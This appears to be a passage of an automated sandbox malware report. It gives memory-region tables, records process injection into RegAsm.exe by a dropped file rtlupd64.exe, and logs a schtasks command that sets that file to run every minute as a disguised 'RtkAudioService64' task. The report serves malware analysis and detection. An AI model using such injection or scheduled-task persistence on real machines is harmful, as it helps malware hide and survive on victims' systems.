| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000000020000 | 0x00020000 | 0x00020fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000030000 | 0x00030000 | 0x00033fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000040000 | 0x00040000 | 0x00040fff | Pagefile Backed Memory | r |
|
|
|
- |
| locale.nls | 0x00050000 | 0x000b6fff | Memory Mapped File | r |
|
|
|
- |
| private_0x00000000000c0000 | 0x000c0000 | 0x000c0fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000000d0000 | 0x000d0000 | 0x000d0fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000000e0000 | 0x000e0000 | 0x000e0fff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x00000000000f0000 | 0x000f0000 | 0x000f0fff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000000100000 | 0x00100000 | 0x0010ffff | Private Memory | - |
|
|
|
- |
| private_0x0000000000110000 | 0x00110000 | 0x0011ffff | Private Memory | - |
|
|
|
- |
| private_0x0000000000120000 | 0x00120000 | 0x0012ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000130000 | 0x00130000 | 0x0022ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000230000 | 0x00230000 | 0x0023ffff | Private Memory | - |
|
|
|
- |
| private_0x0000000000240000 | 0x00240000 | 0x0024ffff | Private Memory | - |
|
|
|
- |
| private_0x0000000000250000 | 0x00250000 | 0x0025ffff | Private Memory | - |
|
|
|
- |
| private_0x0000000000260000 | 0x00260000 | 0x0026ffff | Private Memory | - |
|
|
|
- |
| pagefile_0x0000000000270000 | 0x00270000 | 0x00270fff | Pagefile Backed Memory | rw |
|
|
|
- |
| l_intl.nls | 0x00280000 | 0x00282fff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000000290000 | 0x00290000 | 0x0038ffff | Private Memory | rw |
|
|
|
- |
| rpcss.dll | 0x00390000 | 0x003ebfff | Memory Mapped File | r |
|
|
|
- |
| regasm.exe | 0x00390000 | 0x0039cfff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x0000000000390000 | 0x00390000 | 0x00390fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000000003a0000 | 0x003a0000 | 0x003affff | Private Memory | rw |
|
|
|
- |
| sorttbls.nlp | 0x003b0000 | 0x003b4fff | Memory Mapped File | r |
|
|
|
- |
| private_0x00000000003c0000 | 0x003c0000 | 0x003cffff | Private Memory | - |
|
|
|
- |
| private_0x00000000003d0000 | 0x003d0000 | 0x003dffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000003e0000 | 0x003e0000 | 0x003e0fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000003e0000 | 0x003e0000 | 0x003eafff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x00000000003f0000 | 0x003f0000 | 0x003fffff | Private Memory | - |
|
|
|
- |
| private_0x0000000000400000 | 0x00400000 | 0x00455fff | Private Memory | rwx |
|
|
|
- |
| private_0x0000000000460000 | 0x00460000 | 0x004fffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000460000 | 0x00460000 | 0x00483fff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x0000000000490000 | 0x00490000 | 0x00496fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000000004a0000 | 0x004a0000 | 0x004affff | Private Memory | - |
|
|
|
- |
| private_0x00000000004b0000 | 0x004b0000 | 0x004bffff | Private Memory | - |
|
|
|
- |
| private_0x00000000004c0000 | 0x004c0000 | 0x004cffff | Private Memory | - |
|
|
|
- |
| pagefile_0x00000000004d0000 | 0x004d0000 | 0x004d1fff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000000500000 | 0x00500000 | 0x0050ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000510000 | 0x00510000 | 0x005d7fff | Pagefile Backed Memory | r |
|
|
|
- |
| sortkey.nlp | 0x005e0000 | 0x00620fff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000000650000 | 0x00650000 | 0x0068ffff | Private Memory | rwx |
|
|
|
- |
| pagefile_0x0000000000690000 | 0x00690000 | 0x00790fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000000007a0000 | 0x007a0000 | 0x0086ffff | Private Memory | rw |
|
|
|
- |
| mscorrc.dll | 0x007a0000 | 0x007f3fff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000000830000 | 0x00830000 | 0x0086ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000870000 | 0x00870000 | 0x0087ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000880000 | 0x00880000 | 0x0095efff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000000009c0000 | 0x009c0000 | 0x009fffff | Private Memory | rwx |
|
|
|
- |
| pagefile_0x0000000000a00000 | 0x00a00000 | 0x00aa8fff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000000b30000 | 0x00b30000 | 0x00c2ffff | Private Memory | rw |
|
|
|
- |
| sortdefault.nls | 0x00c30000 | 0x00efefff | Memory Mapped File | r |
|
|
|
- |
| regasm.exe | 0x00f70000 | 0x00f7ffff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x0000000000f80000 | 0x00f80000 | 0x01b7ffff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000001b80000 | 0x01b80000 | 0x03b7ffff | Private Memory | rw |
|
|
|
- |
| kernelbase.dll.mui | 0x03b80000 | 0x03c3ffff | Memory Mapped File | rw |
|
|
|
- |
| private_0x0000000003c90000 | 0x03c90000 | 0x03d8ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000003d90000 | 0x03d90000 | 0x04d8ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004d90000 | 0x04d90000 | 0x04ebffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004ec0000 | 0x04ec0000 | 0x05ebffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000005ec0000 | 0x05ec0000 | 0x0610ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000006130000 | 0x06130000 | 0x0622ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000006350000 | 0x06350000 | 0x0644ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000006610000 | 0x06610000 | 0x0670ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000006740000 | 0x06740000 | 0x0683ffff | Private Memory | rw |
|
|
|
- |
| microsoft.visualbasic.ni.dll | 0x602d0000 | 0x6046afff | Memory Mapped File | rwx |
|
|
|
- |
| culture.dll | 0x60340000 | 0x60347fff | Memory Mapped File | rwx |
|
|
|
- |
| system.windows.forms.ni.dll | 0x60470000 | 0x6104dfff | Memory Mapped File | rwx |
|
|
|
- |
| system.drawing.ni.dll | 0x61050000 | 0x611d7fff | Memory Mapped File | rwx |
|
|
|
- |
| system.ni.dll | 0x611e0000 | 0x6197bfff | Memory Mapped File | rwx |
|
|
|
- |
| mscorlib.ni.dll | 0x61980000 | 0x62477fff | Memory Mapped File | rwx |
|
|
|
- |
| mscorwks.dll | 0x62480000 | 0x62a2afff | Memory Mapped File | rwx |
|
|
|
- |
| mscorjit.dll | 0x62f50000 | 0x62faafff | Memory Mapped File | rwx |
|
|
|
- |
| msvcr80.dll | 0x62fb0000 | 0x6304afff | Memory Mapped File | rwx |
|
|
|
- |
| mscoreei.dll | 0x698d0000 | 0x69947fff | Memory Mapped File | rwx |
|
|
|
- |
| mscoree.dll | 0x6fce0000 | 0x6fd29fff | Memory Mapped File | rwx |
|
|
|
- |
| uxtheme.dll | 0x74060000 | 0x7409ffff | Memory Mapped File | rwx |
|
|
|
- |
| version.dll | 0x74f80000 | 0x74f88fff | Memory Mapped File | rwx |
|
|
|
- |
| rsaenh.dll | 0x752a0000 | 0x752dafff | Memory Mapped File | rwx |
|
|
|
- |
| cryptsp.dll | 0x75500000 | 0x75515fff | Memory Mapped File | rwx |
|
|
|
- |
| cryptbase.dll | 0x75980000 | 0x7598bfff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrtremote.dll | 0x75a20000 | 0x75a2dfff | Memory Mapped File | rwx |
|
|
|
- |
| profapi.dll | 0x75a30000 | 0x75a3afff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x75c20000 | 0x75c69fff | Memory Mapped File | rwx |
|
|
|
- |
| user32.dll | 0x75d30000 | 0x75df8fff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x75e90000 | 0x75ea8fff | Memory Mapped File | rwx |
|
|
|
- |
| gdi32.dll | 0x75ec0000 | 0x75f0dfff | Memory Mapped File | rwx |
|
|
|
- |
| shell32.dll | 0x75f10000 | 0x76b59fff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x76ba0000 | 0x76c40fff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x76c50000 | 0x76cfbfff | Memory Mapped File | rwx |
|
|
|
- |
| msctf.dll | 0x76ea0000 | 0x76f6bfff | Memory Mapped File | rwx |
|
|
|
- |
| advapi32.dll | 0x76f70000 | 0x7700ffff | Memory Mapped File | rwx |
|
|
|
- |
| imm32.dll | 0x77010000 | 0x7702efff | Memory Mapped File | rwx |
|
|
|
- |
| usp10.dll | 0x77130000 | 0x771ccfff | Memory Mapped File | rwx |
|
|
|
- |
| shlwapi.dll | 0x771d0000 | 0x77226fff | Memory Mapped File | rwx |
|
|
|
- |
| ole32.dll | 0x772b0000 | 0x7740bfff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x777b0000 | 0x77883fff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x778e0000 | 0x77a1bfff | Memory Mapped File | rwx |
|
|
|
- |
| lpk.dll | 0x77a20000 | 0x77a29fff | Memory Mapped File | rwx |
|
|
|
- |
| apisetschema.dll | 0x77b20000 | 0x77b20fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000000007f6f0000 | 0x7f6f0000 | 0x7f7effff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000007ffb0000 | 0x7ffb0000 | 0x7ffd2fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007ffd8000 | 0x7ffd8000 | 0x7ffd8fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffd9000 | 0x7ffd9000 | 0x7ffd9fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffda000 | 0x7ffda000 | 0x7ffdafff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffdb000 | 0x7ffdb000 | 0x7ffdbfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffdc000 | 0x7ffdc000 | 0x7ffdcfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffdd000 | 0x7ffdd000 | 0x7ffddfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffde000 | 0x7ffde000 | 0x7ffdefff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffdf000 | 0x7ffdf000 | 0x7ffdffff | Private Memory | rw |
|
|
|
- |
Injection Information
| Injection Type | Source Process | Source Os Thread ID | Information | Success | Count | Logfile |
|---|---|---|---|---|---|---|
| Modify Memory | #18: c:\users\jpenum\appdata\roaming\appmgr\rtlupd64.exe | 0x94c | address = 0x400000, size = 352256 |
|
1 | |
| Modify Memory | #18: c:\users\jpenum\appdata\roaming\appmgr\rtlupd64.exe | 0x94c | address = 0x7ffd9008, size = 4 |
|
1 | |
| Modify Control Flow | #18: c:\users\jpenum\appdata\roaming\appmgr\rtlupd64.exe | 0x94c | os_tid = 0xaf4, address = 0x77927098 |
|
1 |
Host Behavior
File (1)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Info | C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe.Config | type = file_attributes |
|
1 |
System (3)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Info | type = Operating System |
|
3 |
Mutex (1)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Create | mutex_name = a403e9b3-6f76-41ac-ab55-e693040d1b8b |
|
1 |
Environment (2)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | name = COR_PROFILER |
|
1 | |
| Get Environment String | name = COR_ENABLE_PROFILING |
|
1 |
Process #20: schtasks.exe
18
0
| Information | Value |
|---|---|
| ID | #20 |
| File Name | c:\windows\system32\schtasks.exe |
| Command Line | "C:\Windows\System32\schtasks.exe" /create /tn RtkAudioService64 /tr "C:\Users\JPenUM\AppData\Roaming\appmgr\RtlUpd64.exe" /sc minute /mo 1 /F |
| Initial Working Directory | C:\Windows\system32\ |
| Monitor | Start Time: 00:02:03, Reason: Child Process |
| Unmonitor | End Time: 00:02:09, Reason: Self Terminated |
| Monitor Duration | 00:00:06 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x7a4 |
| Parent PID | 0x15c (c:\users\jpenum\appdata\roaming\appmgr\rtlupd64.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | ARRARNMKU\JPenUM |
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
7A8
0x
BD4
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000010000 | 0x00010000 | 0x0002ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x0000000000020000 | 0x00020000 | 0x0002ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x0000000000030000 | 0x00030000 | 0x00033fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000040000 | 0x00040000 | 0x00040fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000050000 | 0x00050000 | 0x00056fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000060000 | 0x00060000 | 0x00061fff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000000070000 | 0x00070000 | 0x000affff | Private Memory | rw |
|
|
|
- |
| schtasks.exe.mui | 0x000b0000 | 0x000c1fff | Memory Mapped File | rw |
|
|
|
- |
| private_0x00000000000d0000 | 0x000d0000 | 0x000d0fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000000e0000 | 0x000e0000 | 0x001dffff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0x001e0000 | 0x00246fff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000000250000 | 0x00250000 | 0x00250fff | Private Memory | rw |
|
|
|
- |
| rpcss.dll | 0x00260000 | 0x002bbfff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000000260000 | 0x00260000 | 0x002effff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000260000 | 0x00260000 | 0x0029ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000002a0000 | 0x002a0000 | 0x002a0fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000000002b0000 | 0x002b0000 | 0x002effff | Private Memory | rw |
|
|
|
- |
| private_0x00000000002f0000 | 0x002f0000 | 0x002fffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000300000 | 0x00300000 | 0x00300fff | Pagefile Backed Memory | r |
|
|
|
- |
| schtasks.exe | 0x00350000 | 0x0037dfff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x0000000000380000 | 0x00380000 | 0x00447fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000450000 | 0x00450000 | 0x00550fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000560000 | 0x00560000 | 0x0115ffff | Pagefile Backed Memory | r |
|
|
|
- |
| sortdefault.nls | 0x01160000 | 0x0142efff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x0000000001430000 | 0x01430000 | 0x0150efff | Pagefile Backed Memory | r |
|
|
|
- |
| uxtheme.dll | 0x74060000 | 0x7409ffff | Memory Mapped File | rwx |
|
|
|
- |
| xmllite.dll | 0x740a0000 | 0x740cefff | Memory Mapped File | rwx |
|
|
|
- |
| ktmw32.dll | 0x740d0000 | 0x740d8fff | Memory Mapped File | rwx |
|
|
|
- |
| taskschd.dll | 0x74640000 | 0x746bcfff | Memory Mapped File | rwx |
|
|
|
- |
| version.dll | 0x74f80000 | 0x74f88fff | Memory Mapped File | rwx |
|
|
|
- |
| sspicli.dll | 0x75960000 | 0x7597afff | Memory Mapped File | rwx |
|
|
|
- |
| cryptbase.dll | 0x75980000 | 0x7598bfff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x75c20000 | 0x75c69fff | Memory Mapped File | rwx |
|
|
|
- |
| user32.dll | 0x75d30000 | 0x75df8fff | Memory Mapped File | rwx |
|
|
|
- |
| oleaut32.dll | 0x75e00000 | 0x75e8efff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x75e90000 | 0x75ea8fff | Memory Mapped File | rwx |
|
|
|
- |
| gdi32.dll | 0x75ec0000 | 0x75f0dfff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x76ba0000 | 0x76c40fff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x76c50000 | 0x76cfbfff | Memory Mapped File | rwx |
|
|
|
- |
| msctf.dll | 0x76ea0000 | 0x76f6bfff | Memory Mapped File | rwx |
|
|
|
- |
| advapi32.dll | 0x76f70000 | 0x7700ffff | Memory Mapped File | rwx |
|
|
|
- |
| imm32.dll | 0x77010000 | 0x7702efff | Memory Mapped File | rwx |
|
|
|
- |
| usp10.dll | 0x77130000 | 0x771ccfff | Memory Mapped File | rwx |
|
|
|
- |
| shlwapi.dll | 0x771d0000 | 0x77226fff | Memory Mapped File | rwx |
|
|
|
- |
| ole32.dll | 0x772b0000 | 0x7740bfff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x777b0000 | 0x77883fff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x778e0000 | 0x77a1bfff | Memory Mapped File | rwx |
|
|
|
- |
| lpk.dll | 0x77a20000 | 0x77a29fff | Memory Mapped File | rwx |
|
|
|
- |
| clbcatq.dll | 0x77a70000 | 0x77af2fff | Memory Mapped File | rwx |
|
|
|
- |
| apisetschema.dll | 0x77b20000 | 0x77b20fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000000007f6f0000 | 0x7f6f0000 | 0x7f7effff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000007ffb0000 | 0x7ffb0000 | 0x7ffd2fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007ffdd000 | 0x7ffdd000 | 0x7ffddfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffde000 | 0x7ffde000 | 0x7ffdefff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffdf000 | 0x7ffdf000 | 0x7ffdffff | Private Memory | rw |
|
|
|
- |
Host Behavior
COM (8)
| Operation | Class | Interface | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|---|
| Create | TaskScheduler | ITaskService | cls_context = CLSCTX_INPROC_SERVER, CLSCTX_INPROC_HANDLER, CLSCTX_LOCAL_SERVER, CLSCTX_REMOTE_SERVER |
|
1 | |
| Execute | TaskScheduler | ITaskService | method_name = Connect, user = 715508, domain = 3512654, password = 2266079232 |
|
1 | |
| Execute | TaskScheduler | ITaskService | method_name = GetFolder, new_interface = ITaskFolder |
|
1 | |
| Execute | TaskScheduler | ITaskService | method_name = NewTask, new_interface = ITaskDefinition |
|
1 | |
| Execute | TaskScheduler | ITaskDefinition | method_name = get_Actions, new_interface = IActionCollection |
|
1 | |
| Execute | TaskScheduler | ITaskDefinition | method_name = get_Triggers, new_interface = ITriggerCollection |
|
1 | |
| Execute | TaskScheduler | ITriggerCollection | method_name = Create, type = TASK_TRIGGER_TIME, new_interface = IDailyTrigger |
|
1 | |
| Execute | TaskScheduler | IDailyTrigger | method_name = put_StartBoundary, start_boundary = 2019-01-21T12:20:00 |
|
1 |
File (4)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Info | - | type = file_type |
|
1 | |
| Open | STD_OUTPUT_HANDLE | - |
|
2 | |
| Write | STD_OUTPUT_HANDLE | size = 79 |
|
1 |
Module (9)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Load | VERSION.dll | base_address = 0x74f80000 |
|
1 | |
| Load | ADVAPI32.dll | base_address = 0x76f70000 |
|
1 | |
| Get Handle | c:\windows\system32\schtasks.exe | base_address = 0x350000 |
|
1 | |
| Get Filename | - | process_name = c:\windows\system32\schtasks.exe, file_name_orig = C:\Windows\System32\schtasks.exe, size = 260 |
|
2 | |
| Get Address | c:\windows\system32\version.dll | function = GetFileVersionInfoSizeW, address_out = 0x74f819d9 |
|
1 | |
| Get Address | c:\windows\system32\version.dll | function = GetFileVersionInfoW, address_out = 0x74f819f4 |
|
1 | |
| Get Address | c:\windows\system32\version.dll | function = VerQueryValueW, address_out = 0x74f81b51 |
|
1 | |
| Get Address | c:\windows\system32\advapi32.dll | function = GetUserNameW, address_out = 0x76f8157a |
|
1 |
System (3)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Time | type = System Time, time = 2019-01-21 16:20:24 (UTC) |
|
1 | |
| Get Time | type = Ticks, time = 10972127 |
|
1 | |
| Get Time | type = Local Time, time = 2019-01-21 12:20:27 (Local Time) |
|
1 |
